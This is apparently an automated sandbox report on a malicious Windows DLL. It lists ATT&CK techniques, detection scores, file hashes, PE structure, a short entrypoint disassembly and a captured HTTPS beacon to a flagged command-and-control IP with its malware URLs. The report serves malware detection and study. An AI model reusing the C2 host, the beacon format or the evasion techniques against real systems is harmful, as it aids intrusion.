Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
auExrOTnvB.dll	32%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.regsvr32.exe.e70000.1.unpack	100%	Avira	HEUR/AGEN.1215493	Download File
4.2.rundll32.exe.237001b0000.1.unpack	100%	Avira	HEUR/AGEN.1215493	Download File
2.2.regsvr32.exe.580000.0.unpack	100%	Avira	HEUR/AGEN.1215493	Download File
3.2.rundll32.exe.2135e670000.0.unpack	100%	Avira	HEUR/AGEN.1215493	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://23.239.0.12/m	100%	Avira URL Cloud	malware
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://23.239.0.12/	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://23.239.0.12/h	100%	Avira URL Cloud	malware
https://www.pango.co/privacy	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.239.0.12/	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000014.00000002.589025244.000001E810CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.876538284.00000225A2463000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://23.239.0.12/m	regsvr32.exe, 00000006.00000002.875696976.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000014.00000003.563989076.000001E81159C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.564051263.000001E811A02000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.hotspotshield.com/	svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.hotspotshield.com/terms/	svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://23.239.0.12/h	regsvr32.exe, 00000006.00000002.875809902.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436169934.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436315168.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.436258983.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.pango.co/privacy	svchost.exe, 00000014.00000003.553593466.000001E811A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552511760.000001E811A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.552433864.000001E811A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553102642.000001E81159A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.553365480.000001E8115AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000014.00000003.557823395.000001E81159A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.239.0.12	unknown	United States		63949	LINODE-APLinodeLLCUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626499
Start date and time: 14/05/202205:04:14	2022-05-14 05:04:14 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	auExrOTnvB (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@20/2@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 49 Number of non-executed functions: 214
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, UsoClient.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.223.24.244, 23.211.4.86, 20.49.150.241, 51.104.136.2
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, settings-prod-uks-2.uksouth.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, atm-settingsfe-prod-geo.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:06:53	API Interceptor	11x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
23.239.0.12	PvaOeKqrBs.dll	Get hash	malicious	Browse
	1V4gPPcQvB.dll	Get hash	malicious	Browse
	Plt3z2W7KQ.dll	Get hash	malicious	Browse
	2V7zjcga5L.dll	Get hash	malicious	Browse
	vur7t4SumQ.dll	Get hash	malicious	Browse
	3j6e3XaMWM.dll	Get hash	malicious	Browse
	wgJ5YjI2QO.dll	Get hash	malicious	Browse
	r0hiaXHscs.dll	Get hash	malicious	Browse
	TSvDnT6fkE.dll	Get hash	malicious	Browse
	Plt3z2W7KQ.dll	Get hash	malicious	Browse
	2V7zjcga5L.dll	Get hash	malicious	Browse
	RuqTBW6t32.dll	Get hash	malicious	Browse
	yj81rxDZIp.dll	Get hash	malicious	Browse
	3j6e3XaMWM.dll	Get hash	malicious	Browse
	wgJ5YjI2QO.dll	Get hash	malicious	Browse
	r0hiaXHscs.dll	Get hash	malicious	Browse
	TSvDnT6fkE.dll	Get hash	malicious	Browse
	x4ByCNJqst.dll	Get hash	malicious	Browse
	Xp7X1Yf3CM.dll	Get hash	malicious	Browse
	RuqTBW6t32.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	PvaOeKqrBs.dll	Get hash	malicious	Browse	23.239.0.12
	1V4gPPcQvB.dll	Get hash	malicious	Browse	23.239.0.12
	Plt3z2W7KQ.dll	Get hash	malicious	Browse	23.239.0.12
	2V7zjcga5L.dll	Get hash	malicious	Browse	23.239.0.12
	vur7t4SumQ.dll	Get hash	malicious	Browse	23.239.0.12
	3j6e3XaMWM.dll	Get hash	malicious	Browse	23.239.0.12
	wgJ5YjI2QO.dll	Get hash	malicious	Browse	23.239.0.12
	r0hiaXHscs.dll	Get hash	malicious	Browse	23.239.0.12
	TSvDnT6fkE.dll	Get hash	malicious	Browse	23.239.0.12
	Plt3z2W7KQ.dll	Get hash	malicious	Browse	23.239.0.12
	2V7zjcga5L.dll	Get hash	malicious	Browse	23.239.0.12
	RuqTBW6t32.dll	Get hash	malicious	Browse	23.239.0.12
	yj81rxDZIp.dll	Get hash	malicious	Browse	23.239.0.12
	3j6e3XaMWM.dll	Get hash	malicious	Browse	23.239.0.12
	wgJ5YjI2QO.dll	Get hash	malicious	Browse	23.239.0.12
	r0hiaXHscs.dll	Get hash	malicious	Browse	23.239.0.12
	TSvDnT6fkE.dll	Get hash	malicious	Browse	23.239.0.12
	x4ByCNJqst.dll	Get hash	malicious	Browse	23.239.0.12
	Xp7X1Yf3CM.dll	Get hash	malicious	Browse	23.239.0.12
	RuqTBW6t32.dll	Get hash	malicious	Browse	23.239.0.12

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	PvaOeKqrBs.dll	Get hash	malicious	Browse	23.239.0.12
	1V4gPPcQvB.dll	Get hash	malicious	Browse	23.239.0.12
	Plt3z2W7KQ.dll	Get hash	malicious	Browse	23.239.0.12
	2V7zjcga5L.dll	Get hash	malicious	Browse	23.239.0.12
	vur7t4SumQ.dll	Get hash	malicious	Browse	23.239.0.12
	3j6e3XaMWM.dll	Get hash	malicious	Browse	23.239.0.12
	wgJ5YjI2QO.dll	Get hash	malicious	Browse	23.239.0.12
	r0hiaXHscs.dll	Get hash	malicious	Browse	23.239.0.12
	TSvDnT6fkE.dll	Get hash	malicious	Browse	23.239.0.12
	Plt3z2W7KQ.dll	Get hash	malicious	Browse	23.239.0.12
	2V7zjcga5L.dll	Get hash	malicious	Browse	23.239.0.12
	RuqTBW6t32.dll	Get hash	malicious	Browse	23.239.0.12
	yj81rxDZIp.dll	Get hash	malicious	Browse	23.239.0.12
	3j6e3XaMWM.dll	Get hash	malicious	Browse	23.239.0.12
	wgJ5YjI2QO.dll	Get hash	malicious	Browse	23.239.0.12
	r0hiaXHscs.dll	Get hash	malicious	Browse	23.239.0.12
	TSvDnT6fkE.dll	Get hash	malicious	Browse	23.239.0.12
	x4ByCNJqst.dll	Get hash	malicious	Browse	23.239.0.12
	Xp7X1Yf3CM.dll	Get hash	malicious	Browse	23.239.0.12
	RuqTBW6t32.dll	Get hash	malicious	Browse	23.239.0.12

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xee4b08f8, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25073114079603587
Encrypted:	false
SSDEEP:	384:8+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:jSB2nSB2RSjlK/+mLesOj1J2
MD5:	28E6E1B00F6AF0D5C7D898750C721BCF
SHA1:	A008B0637F830433009546408C0ADFE8C6A02CBB
SHA-256:	9CB5A2F7721B5C669DDECB6D5731213F1ED81D220804F04B430CBDC4EA8411BF
SHA-512:	189E14CCA28CE069EACEAAA5C571B32298D612A048E90DB06CB4BE753D5B2CF1238257BD5A56F2EC667A26DC7A03AEB8C7869CC0346690DEF01E989107448E1B
Malicious:	false
Preview:	.K..... ................e.f.3...w........................&..........w.......z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...............................................................................................................................................................................................................................................zq..........................zq.........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.482092294480976
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	auExrOTnvB.dll
File size:	545280
MD5:	e7d280d6c63840b28ca759ff07747ea1
SHA1:	581dba2d1101e09dfeb290059c632ab266da49e3
SHA256:	a1637271aa4a35c54d8df7f9c62bb31ae3bf58c9c390bc1b1ce717cdf3eaeb2c
SHA512:	a10bb287a791f071e18276bae776613146c79f1e7c462be93053ebaa3d7cc277afd66d9dc6d8d0585f31610f8472bf408b7260d96a9aee3243f50dff9510ef64
SSDEEP:	12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZwHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVU
TLSH:	3CC4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x1800423a8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627D8598 [Thu May 12 22:09:28 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	b268dbaa2e6eb6acd16e04d482356598

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007F26F0A75257h
call 00007F26F0A773E4h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007F26F0A75100h
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 00000088h
dec eax
lea ecx, dword ptr [00014D05h]
call dword ptr [0000FC7Fh]
dec esp
mov ebx, dword ptr [00014DF0h]
dec esp
mov dword ptr [esp+58h], ebx
inc ebp
xor eax, eax
dec eax
lea edx, dword ptr [esp+60h]
dec eax
mov ecx, dword ptr [esp+58h]
call 00007F26F0A83DDAh
dec eax
mov dword ptr [esp+50h], eax
dec eax
cmp dword ptr [esp+50h], 00000000h
je 00007F26F0A75293h
dec eax
mov dword ptr [esp+38h], 00000000h
dec eax
lea eax, dword ptr [esp+48h]
dec eax
mov dword ptr [esp+30h], eax
dec eax
lea eax, dword ptr [esp+40h]
dec eax
mov dword ptr [esp+28h], eax
dec eax
lea eax, dword ptr [00014CB0h]
dec eax
mov dword ptr [esp+20h], eax
dec esp
mov ecx, dword ptr [esp+50h]
dec esp
mov eax, dword ptr [esp+58h]
dec eax
mov edx, dword ptr [esp+60h]
xor ecx, ecx
call 00007F26F0A83D88h
jmp 00007F26F0A75274h
dec eax
mov eax, dword ptr [eax+eax+00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x55cf0	0x6f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5544c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x2dffc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x59000	0xe1c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x88000	0x1d8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x52000	0x288	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x504ca	0x50600	False	0.389081940124	zlib compressed data	5.26882252971	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x52000	0x3d5f	0x3e00	False	0.355279737903	data	5.39324872925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x56000	0x20d8	0x1200	False	0.180772569444	data	2.18161586025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x59000	0xe1c	0x1000	False	0.44580078125	data	4.98556265168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x5a000	0x2dffc	0x2e000	False	0.839408542799	data	7.73448363752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x88000	0x6f8	0x800	False	0.1796875	data	1.81179169858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_RCDATA	0x5a0a0	0x2de00	data	English	United States
RT_MANIFEST	0x87ea0	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

ExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA

ole32.dll

CoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x180042050
DllUnregisterServer	2	0x180042080

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 05:06:02.531857967 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:02.531902075 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:02.532002926 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:03.277209997 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:03.277231932 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:03.825073957 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:03.825228930 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:05.793554068 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:05.793575048 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:05.793839931 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:05.793958902 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:05.810230017 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:05.852513075 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:06.647135019 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:06.647238016 CEST	443	49771	23.239.0.12	192.168.2.7
May 14, 2022 05:06:06.647433996 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:06.650288105 CEST	49771	443	192.168.2.7	23.239.0.12
May 14, 2022 05:06:06.650329113 CEST	443	49771	23.239.0.12	192.168.2.7

HTTP Request Dependency Graph

23.239.0.12

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49771	23.239.0.12	443	C:\Windows\System32\regsvr32.exe

Timestamp	Direction	Data
2022-05-14 03:06:05 UTC	OUT	GET / HTTP/1.1 Cookie: gKBwCZiad=NW34A/ewe7FxqPhMAuK21ZwVv3rdZ87BskOx+wjRUAnfBaq4cf9aNBgPNCTT1N6Kdnjcay3P/dq7IPXK3Ur94zkIJrYMuf9rco7HnCAxSoMXPKPPSGHF/JuCkMcIkLPKPgQcrtnYZzk+qIW2jl1yEgNtAYiTvtfm8DPlYXQpM4FFwfgEU7ZYkmIwQGBGuAol5ZW3uboPMBOB+sGL8hqhjv/okvEbAGaS9CLfg0hoMbMG/kvUASBfnS/D7Kcz1OPFkX5zF0NLSsP/VZKbEWabu2YN6iUNc9eG6HtC15UDzoqQUwiOtqpJHTiGw4eKylajDrqpMZZgT1o6 Host: 23.239.0.12 Connection: Keep-Alive Cache-Control: no-cache
2022-05-14 03:06:06 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 May 2022 03:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2022-05-14 03:06:06 UTC	IN	Data Raw: 31 31 37 0d 0a 16 ba 17 30 01 6a c4 b6 22 b7 05 8a d5 5f f9 d6 b4 fd 17 c1 8b ca 81 92 2b 88 48 ed 16 98 38 ba af 92 63 c8 f9 e7 64 b0 45 04 95 b0 49 6c 04 cf a3 d3 a6 e5 ea 8d 22 36 c4 0b b5 a8 bd de 80 a1 f2 b6 c4 22 59 0e 6f 84 dc ef 41 84 bd f6 3d d7 c4 be 2e 62 26 68 81 03 7c 67 09 84 97 92 3e 6f 87 46 5f 00 d9 bb 1f b4 b2 e6 c3 9c 48 0c c1 c6 ad 22 4d 08 9f 92 7b cd 1b 7e 7e 18 1f 38 e2 11 a0 26 26 af 35 df 5b e4 a8 83 be 48 31 ab 97 2d 1c 3c ee 8c 6d 6c 53 1a c2 3a f8 9d ae c4 2c 70 66 84 d0 43 48 35 f4 89 d2 17 42 2f 25 65 0e d9 f3 04 d0 d4 92 48 74 59 ee cc cc 81 0a 17 a4 e4 eb 0c f3 6b 4d a6 e8 e4 6e e8 9a 29 34 f6 0d 80 54 5a 84 e1 eb c7 8f 55 46 7e ac 51 38 c2 bc e0 a5 67 3e af b3 ee 34 a5 17 9b a9 6c 3a 8f 70 18 d7 02 c1 06 7a b5 cd de e6 b5 Data Ascii: 1170j"_+H8cdEIl"6"YoA=.b&h\|g>oF_H"M{~~8&&5[H1-<mlS:,pfCH5B/%eHtYkMn)4TZUF~Q8g>4l:pz

Target ID:	0
Start time:	05:05:26
Start date:	14/05/2022
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\auExrOTnvB.dll"
